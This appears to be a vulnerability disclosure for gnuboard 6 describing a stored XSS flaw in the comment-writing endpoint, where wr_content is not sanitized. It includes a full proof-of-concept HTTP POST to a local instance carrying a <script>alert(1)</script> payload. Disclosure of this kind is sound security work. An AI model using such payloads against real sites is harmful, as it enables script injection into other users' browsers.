Hello.

Currently, there is a writing vulnerability using the

[Name of affected Product]

gnuboard 6

[Affected version]

https://github.com/gnuboard/g6/commit/58c737a263ac0c523592fd87ff71b9e3c07d7cf5

[Vulnerability Type]

• Stored XSS

[Root Cause]

• While writing reply on a post, wr_content parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.

[Attack Vectors]

https://github.com/gnuboard/g6/assets/25397908/1165cc3e-b16a-402f-8438-731aa686d187

As shown above, it is normally prohibited to enter HTML tags within a web browser, but if you manipulate HTTP requests using proxy tools such as Burp Suite or send web requests directly to the requests library to create comments, the HTML tags are reflected as they are.

This enables Stored XSS attacks by injecting the tag <script>.

The bottom is a PoC Web request.

POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close

w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>